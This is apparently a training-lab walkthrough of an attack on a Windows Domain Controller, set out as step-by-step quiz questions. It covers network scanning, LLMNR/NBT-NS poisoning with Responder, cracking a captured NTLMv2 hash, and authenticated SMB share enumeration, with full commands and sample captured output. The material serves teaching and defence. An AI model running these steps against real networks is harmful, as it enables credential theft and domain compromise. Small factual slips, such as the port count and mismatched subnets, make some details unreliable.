Why Attack a Domain Controller?

Domain Controllers (DCs) are the crown jewels of an organization, within a typical organization, they manage user accounts, authentication, group policies and the like. Compromising a DC gives an attacker the keys to the kingdom - full control of an entire infrastructure.In this lab we will work through a red team operation focused on a Windows Domain Controller. Specifically, you will:

• Conduct a host and service discovery
• Poison LLMNR/NBT-NS
• Crack the hashes you captured
• Enumerate Active Directory with the hashes you were able to capture
• Execute a standard privilege escalation path to the compromised account that provides domain admin access

Whether you are learning about offensive tactics, or a system administrator looking to harden and defend your infrastructure, this walkthrough will walk you through the full kill chain for this scenario - step by step.

Optional: You can connect to this lab using a VPN to run all your tools from your own Kali machine. 

Machine Type: Windows

Machine Difficulty: Medium

Target IP Address: [To be discovered on boot]

LAN Subnet: 192.168.45.0/24

Let's get started hunting

Before we can do anything, we first need to find the exact IP address of the target computer on our local network.

Goal: Find the correct IP address of the target computer

Tool: arp-scan

Simple scanner that helps find active computers on your immediate network. 

Open your terminal and type following command:

┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l

• sudo: To run the command as root.
• arp-scan: To run the arp-scan program
• -l: To scan all the local network connectios.

arp-scan will show you a list of IP addresses for all active devices it finds on your local network.

Question: What is the IP address of the Target machine?

Our first task is to figure out what's running on this machine. Think of it like walking around a building and seeing which lights are on, and what kind of doors are open.

Goal: Find all open TCP ports and identify the services running on them

Tool: nmap

A tool that use for network discovery and security auditing. it can do everything from simply checking if a host is up to identifying services and even vulnerabilities.

Open your terminal and type:

┌──(kali㉿kali)-[~]
└─$ nmap -sV -sC -Pn -T4 [Target-IP] -p-

• -sV: Enable service detection
• -sC: Enable basic script scan
• -Pn: Skip ping scan (Assume host is up)
• -T4: Increase scanning speed
• -p-: To scan all 65635 TCP ports

Note: In real penetration testing, you can start scanning without -p- option to save time, if you didn't found any interesting result go back with -p- .

The target runs Kerberos, LDAP and SMB. We can know from this that the target is a Windows Domain Controller

Question: What is the NetBIOS name of the scanned host?

While TCP scans are essential, many services, especially in a Windows environment, also communicate over UDP (User Datagram Protocol).

Goal: Identify open UDP ports and their services

In your terminal type:

┌──(kali㉿kali)-[~]
└─$ nmap -T4 -sU -F -Pn [Target-IP]

• -T4: Set the speed of the scan
• -sU: Tell nmap to scan UDP ports
• -F: Fast scan, scan only top 100 most commonf ports
• -Pn: Skip host discovery, assume target is up

Question: What is the service running on UDP port 123?

Now that we have a good understanding of our target's services, it's time to look for ways to exploit them. One common vulnerability in Windows networks involves protocols like LLMNR and NBT-NS.

Understanding LLMNR/NBT-NS Poisoning

LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) are fallback name resolution protocols used by Windows (and other) operating systems when DNS fails.

The Vulnerability: If a client tries to resolve a hostname (e.g., a file share) and DNS doesn't respond, it might broadcast an LLMNR/NBT-NS query on the local network.

So, Since we are on the same LAN as the domain controller we can perform LLMNR | NBT-NS poisoning attack using the responder.

Goal: Capture hashed credentials from clients on the network

Tool: Responder

powerful tool specifically designed for LLMNR, NBT-NS, and mDNS poisoning, as well as capturing credentials from various protocols.

Open your terminal and type:

┌──(kali㉿kali)-[~]
└─$ sudo responder -I 'eth0' -v

• -I 'eth0': To specifies the network interface Responder should listen on
• -v: Enables verbose output

Now, Responder will start listening on the specified interface. It will passively wait for LLMNR/NBT-NS queries. If a client on the network sends out a query for a name that DNS can't resolve, Responder will spoof a response, claiming to be that host.

Wait for few minutes until your kali catpure and display the hash.

[*] [DNS] A Record poisoned answer sent to: 192.168.10.4     Requested name: .FileServer.SOUPEDECODE.LOCAL
[SMB] NTLMv2-SSP Client   : 192.168.10.4
[SMB] NTLMv2-SSP Username : soupedecode\xk******
[SMB] NTLMv2-SSP Hash     : xk****::so****:06952bd9b466cbc9:67E056B0CCAB650FC159EC3A97BC49E6:0101000000000000004.... 

Ignore any error like:

[!] Error starting TCP server on port 3389, check permissions or other servers running.

Question: What is the username of the user whose NTLMv2 hash was captured during the Responder attack?

Now that we have a hash, next step is to try and crack it. This means using a tool to perform a "dictionary attack" or "brute-force" attack, trying millions of common passwords or permutations until we find one that generates the same hash.

Goal: Crack the NTLMv2 hash we captured to reveal the user's plain-text password.

Tool: John the Ripper

Open-source password cracking tool. It supports a wide variety of hash types and attack modes.

Note: Before running John, you need to save the captured hash value into a file. Let's assume you save the hash into file named hash.txt

xk****::so****:06952bd9b466cbc9:67E056B0CCAB650FC159EC3A97BC49E6:0101000000000000004.... 

Now, in your terminal type:

┌──(kali㉿kali)-[~]
└─$ john hash.txt -w /usr/share/wordlists/john.lst --format=netntlmv2

• -w: Specifies the wordlist to use
• --format=netntlmv2: tells John the Ripper that the hash in hash.txt is in the netntlmv2 format

Note: John can automatically detect some hash formats, but explicitly specifying it can help, especially with complex hashes.

We now have the plain-text password for user xk******.

Question: What is the clear text password for user xk******?

With a username and password, we can now attempt to authenticate to the target system and gather more information.

Goal: List the SMB shared folders using the new login details.

Tool: netexec

Powerful tool for pentesting large networks. It's designed to automate various tasks related to credential testing, enumeration, and exploitation

Open your terminal and type:

┌──(kali㉿kali)-[~]
└─$ netexec smb [Target-IP] -u [User Name] -p [Password] --shares

• smb: Specifies that we are targeting the SMB protocol
• -u: Specifies the username
• -p: Specifies the password we cracked
• --shares: tells NetExec to enumerate SMB shares that the provided user has access to

This will retrive all available share with some other information.

Question: There is an interesting custom share with READ,WRITE permession, what is the share name?